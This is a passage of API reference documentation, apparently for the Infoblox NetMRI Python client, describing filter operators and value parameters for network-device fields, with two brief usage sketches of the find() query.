| ``default:`` None
:param val_c_DeviceConfigLastCheckedTime: If op_DeviceConfigLastCheckedTime is specified, this value will be compared to the value in DeviceConfigLastCheckedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceConfigLastCheckedTime must be specified if op_DeviceConfigLastCheckedTime is specified.
:type val_c_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceConfigTimestamp: The operator to apply to the field DeviceConfigTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceConfigTimestamp: If op_DeviceConfigTimestamp is specified, the field named in this input will be compared to the value in DeviceConfigTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceConfigTimestamp must be specified if op_DeviceConfigTimestamp is specified.
:type val_f_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceConfigTimestamp: If op_DeviceConfigTimestamp is specified, this value will be compared to the value in DeviceConfigTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceConfigTimestamp must be specified if op_DeviceConfigTimestamp is specified.
:type val_c_DeviceConfigTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceContextName: The operator to apply to the field DeviceContextName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceContextName: The name of the virtual context of this virtual device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceContextName: If op_DeviceContextName is specified, the field named in this input will be compared to the value in DeviceContextName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceContextName must be specified if op_DeviceContextName is specified.
:type val_f_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceContextName: If op_DeviceContextName is specified, this value will be compared to the value in DeviceContextName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceContextName must be specified if op_DeviceContextName is specified.
:type val_c_DeviceContextName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceDNSName: The operator to apply to the field DeviceDNSName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceDNSName: The device name as reported by DNS. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceDNSName: If op_DeviceDNSName is specified, the field named in this input will be compared to the value in DeviceDNSName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceDNSName must be specified if op_DeviceDNSName is specified.
:type val_f_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceDNSName: If op_DeviceDNSName is specified, this value will be compared to the value in DeviceDNSName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceDNSName must be specified if op_DeviceDNSName is specified.
:type val_c_DeviceDNSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceFirstOccurrenceTime: The operator to apply to the field DeviceFirstOccurrenceTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceFirstOccurrenceTime: If op_DeviceFirstOccurrenceTime is specified, the field named in this input will be compared to the value in DeviceFirstOccurrenceTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceFirstOccurrenceTime must be specified if op_DeviceFirstOccurrenceTime is specified.
:type val_f_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceFirstOccurrenceTime: If op_DeviceFirstOccurrenceTime is specified, this value will be compared to the value in DeviceFirstOccurrenceTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceFirstOccurrenceTime must be specified if op_DeviceFirstOccurrenceTime is specified.
:type val_c_DeviceFirstOccurrenceTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: An internal NetMRI identifier for the device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceIPDotted: The operator to apply to the field DeviceIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values. See the usage sketch following this field's value entries below.
:type op_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPDotted: If op_DeviceIPDotted is specified, the field named in this input will be compared to the value in DeviceIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPDotted must be specified if op_DeviceIPDotted is specified.
:type val_f_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPDotted: If op_DeviceIPDotted is specified, this value will be compared to the value in DeviceIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPDotted must be specified if op_DeviceIPDotted is specified.
:type val_c_DeviceIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
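A minimal usage sketch, assuming the ``infoblox-netmri`` Python client and its ``InfraDevice`` broker (the host, credentials, and match values below are illustrative placeholders, not part of the API)::

    from infoblox_netmri.client import InfobloxNetMRI

    # Connect to a NetMRI appliance (placeholder connection details).
    client = InfobloxNetMRI("netmri.example.com", "admin", "secret")
    broker = client.get_broker("InfraDevice")

    # val_c_* compares the field against an explicit constant value...
    by_constant = broker.find(op_DeviceIPDotted="like",
                              val_c_DeviceIPDotted="10.1.%")

    # ...while val_f_* names another field whose value is compared instead.
    by_field = broker.find(op_DeviceName="=",
                           val_f_DeviceName="DeviceSysName")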
:param op_DeviceIPNumeric: The operator to apply to the field DeviceIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPNumeric: The numerical value of the device IP address. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPNumeric: If op_DeviceIPNumeric is specified, the field named in this input will be compared to the value in DeviceIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPNumeric must be specified if op_DeviceIPNumeric is specified.
:type val_f_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPNumeric: If op_DeviceIPNumeric is specified, this value will be compared to the value in DeviceIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPNumeric must be specified if op_DeviceIPNumeric is specified.
:type val_c_DeviceIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceMAC: The operator to apply to the field DeviceMAC. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest-numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceMAC: If op_DeviceMAC is specified, the field named in this input will be compared to the value in DeviceMAC using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceMAC must be specified if op_DeviceMAC is specified.
:type val_f_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceMAC: If op_DeviceMAC is specified, this value will be compared to the value in DeviceMAC using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceMAC must be specified if op_DeviceMAC is specified.
:type val_c_DeviceMAC: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceModel: The operator to apply to the field DeviceModel. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceModel: The device model name. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceModel: If op_DeviceModel is specified, the field named in this input will be compared to the value in DeviceModel using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceModel must be specified if op_DeviceModel is specified.
:type val_f_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceModel: If op_DeviceModel is specified, this value will be compared to the value in DeviceModel using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceModel must be specified if op_DeviceModel is specified.
:type val_c_DeviceModel: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceName: The operator to apply to the field DeviceName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceName: The NetMRI name of the device; this will be the same as either DeviceSysName or DeviceDNSName, depending on your NetMRI configuration. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceName: If op_DeviceName is specified, the field named in this input will be compared to the value in DeviceName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceName must be specified if op_DeviceName is specified.
:type val_f_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceName: If op_DeviceName is specified, this value will be compared to the value in DeviceName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceName must be specified if op_DeviceName is specified.
:type val_c_DeviceName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceNetBIOSName: The operator to apply to the field DeviceNetBIOSName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceNetBIOSName: The NetBIOS name of the device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceNetBIOSName: If op_DeviceNetBIOSName is specified, the field named in this input will be compared to the value in DeviceNetBIOSName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceNetBIOSName must be specified if op_DeviceNetBIOSName is specified.
:type val_f_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceNetBIOSName: If op_DeviceNetBIOSName is specified, this value will be compared to the value in DeviceNetBIOSName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceNetBIOSName must be specified if op_DeviceNetBIOSName is specified.
:type val_c_DeviceNetBIOSName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceOUI: The operator to apply to the field DeviceOUI. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceOUI: The NetMRI-determined device vendor, based on the OUI. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceOUI: If op_DeviceOUI is specified, the field named in this input will be compared to the value in DeviceOUI using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceOUI must be specified if op_DeviceOUI is specified.
:type val_f_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceOUI: If op_DeviceOUI is specified, this value will be compared to the value in DeviceOUI using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceOUI must be specified if op_DeviceOUI is specified.
:type val_c_DeviceOUI: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DevicePolicyScheduleMode: The operator to apply to the field DevicePolicyScheduleMode. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DevicePolicyScheduleMode: Not currently used. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DevicePolicyScheduleMode: If op_DevicePolicyScheduleMode is specified, the field named in this input will be compared to the value in DevicePolicyScheduleMode using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DevicePolicyScheduleMode must be specified if op_DevicePolicyScheduleMode is specified.
:type val_f_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DevicePolicyScheduleMode: If op_DevicePolicyScheduleMode is specified, this value will be compared to the value in DevicePolicyScheduleMode using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DevicePolicyScheduleMode must be specified if op_DevicePolicyScheduleMode is specified.
:type val_c_DevicePolicyScheduleMode: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceRebootTime: The operator to apply to the field DeviceRebootTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRebootTime: The date/time this device was last rebooted. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values. See the sketch of the between operator following this field's value entries below.
:type op_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRebootTime: If op_DeviceRebootTime is specified, the field named in this input will be compared to the value in DeviceRebootTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRebootTime must be specified if op_DeviceRebootTime is specified.
:type val_f_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRebootTime: If op_DeviceRebootTime is specified, this value will be compared to the value in DeviceRebootTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRebootTime must be specified if op_DeviceRebootTime is specified.
:type val_c_DeviceRebootTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
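A sketch of the ``between`` operator, reusing the ``broker`` from the sketch above (the timestamps are illustrative): the constant is a comma-delimited string with an even number of entries, here a single start/end pair::

    # Devices last rebooted within January 2023 (one start/end pair).
    rebooted_in_jan = broker.find(
        op_DeviceRebootTime="between",
        val_c_DeviceRebootTime="2023-01-01 00:00:00,2023-01-31 23:59:59",
    )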
:param op_DeviceRunningConfigLastChangedTime: The operator to apply to the field DeviceRunningConfigLastChangedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRunningConfigLastChangedTime: If op_DeviceRunningConfigLastChangedTime is specified, the field named in this input will be compared to the value in DeviceRunningConfigLastChangedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRunningConfigLastChangedTime must be specified if op_DeviceRunningConfigLastChangedTime is specified.
:type val_f_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRunningConfigLastChangedTime: If op_DeviceRunningConfigLastChangedTime is specified, this value will be compared to the value in DeviceRunningConfigLastChangedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRunningConfigLastChangedTime must be specified if op_DeviceRunningConfigLastChangedTime is specified.
:type val_c_DeviceRunningConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSAAVersion: The operator to apply to the field DeviceSAAVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSAAVersion: The SAA version running on this device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSAAVersion: If op_DeviceSAAVersion is specified, the field named in this input will be compared to the value in DeviceSAAVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSAAVersion must be specified if op_DeviceSAAVersion is specified.
:type val_f_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSAAVersion: If op_DeviceSAAVersion is specified, this value will be compared to the value in DeviceSAAVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSAAVersion must be specified if op_DeviceSAAVersion is specified.
:type val_c_DeviceSAAVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSavedConfigLastChangedTime: The operator to apply to the field DeviceSavedConfigLastChangedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSavedConfigLastChangedTime: If op_DeviceSavedConfigLastChangedTime is specified, the field named in this input will be compared to the value in DeviceSavedConfigLastChangedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSavedConfigLastChangedTime must be specified if op_DeviceSavedConfigLastChangedTime is specified.
:type val_f_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSavedConfigLastChangedTime: If op_DeviceSavedConfigLastChangedTime is specified, this value will be compared to the value in DeviceSavedConfigLastChangedTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSavedConfigLastChangedTime must be specified if op_DeviceSavedConfigLastChangedTime is specified.
:type val_c_DeviceSavedConfigLastChangedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysContact: The operator to apply to the field DeviceSysContact. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysContact: The device sysContact as reported by SNMP. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysContact: If op_DeviceSysContact is specified, the field named in this input will be compared to the value in DeviceSysContact using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysContact must be specified if op_DeviceSysContact is specified.
:type val_f_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysContact: If op_DeviceSysContact is specified, this value will be compared to the value in DeviceSysContact using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysContact must be specified if op_DeviceSysContact is specified.
:type val_c_DeviceSysContact: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysDescr: The operator to apply to the field DeviceSysDescr. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysDescr: The device sysDescr as reported by SNMP. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysDescr: If op_DeviceSysDescr is specified, the field named in this input will be compared to the value in DeviceSysDescr using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysDescr must be specified if op_DeviceSysDescr is specified.
:type val_f_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysDescr: If op_DeviceSysDescr is specified, this value will be compared to the value in DeviceSysDescr using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysDescr must be specified if op_DeviceSysDescr is specified.
:type val_c_DeviceSysDescr: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysLocation: The operator to apply to the field DeviceSysLocation. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysLocation: The device sysLocation as reported by SNMP. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysLocation: If op_DeviceSysLocation is specified, the field named in this input will be compared to the value in DeviceSysLocation using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysLocation must be specified if op_DeviceSysLocation is specified.
:type val_f_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysLocation: If op_DeviceSysLocation is specified, this value will be compared to the value in DeviceSysLocation using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysLocation must be specified if op_DeviceSysLocation is specified.
:type val_c_DeviceSysLocation: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceSysName: The operator to apply to the field DeviceSysName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceSysName: The device name as reported by SNMP. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceSysName: If op_DeviceSysName is specified, the field named in this input will be compared to the value in DeviceSysName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceSysName must be specified if op_DeviceSysName is specified.
:type val_f_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceSysName: If op_DeviceSysName is specified, this value will be compared to the value in DeviceSysName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceSysName must be specified if op_DeviceSysName is specified.
:type val_c_DeviceSysName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceType: The operator to apply to the field DeviceType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceType: The NetMRI-determined device type. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceType: If op_DeviceType is specified, the field named in this input will be compared to the value in DeviceType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceType must be specified if op_DeviceType is specified.
:type val_f_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceType: If op_DeviceType is specified, this value will be compared to the value in DeviceType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceType must be specified if op_DeviceType is specified.
:type val_c_DeviceType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceUniqueKey: The operator to apply to the field DeviceUniqueKey. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceUniqueKey: A unique key that allows detecting duplicates across different Virtual Networks. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceUniqueKey: If op_DeviceUniqueKey is specified, the field named in this input will be compared to the value in DeviceUniqueKey using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceUniqueKey must be specified if op_DeviceUniqueKey is specified.
:type val_f_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceUniqueKey: If op_DeviceUniqueKey is specified, this value will be compared to the value in DeviceUniqueKey using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceUniqueKey must be specified if op_DeviceUniqueKey is specified.
:type val_c_DeviceUniqueKey: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceVendor: The operator to apply to the field DeviceVendor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceVendor: The device vendor name. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceVendor: If op_DeviceVendor is specified, the field named in this input will be compared to the value in DeviceVendor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceVendor must be specified if op_DeviceVendor is specified.
:type val_f_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceVendor: If op_DeviceVendor is specified, this value will be compared to the value in DeviceVendor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceVendor must be specified if op_DeviceVendor is specified.
:type val_c_DeviceVendor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceVersion: The operator to apply to the field DeviceVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceVersion: The device OS version. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceVersion: If op_DeviceVersion is specified, the field named in this input will be compared to the value in DeviceVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceVersion must be specified if op_DeviceVersion is specified.
:type val_f_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceVersion: If op_DeviceVersion is specified, this value will be compared to the value in DeviceVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceVersion must be specified if op_DeviceVersion is specified.
:type val_c_DeviceVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterProvisionData: The operator to apply to the field FilterProvisionData. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterProvisionData: Internal data; do not modify, as it may change without warning. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_FilterProvisionData: String
| ``api version min:`` None
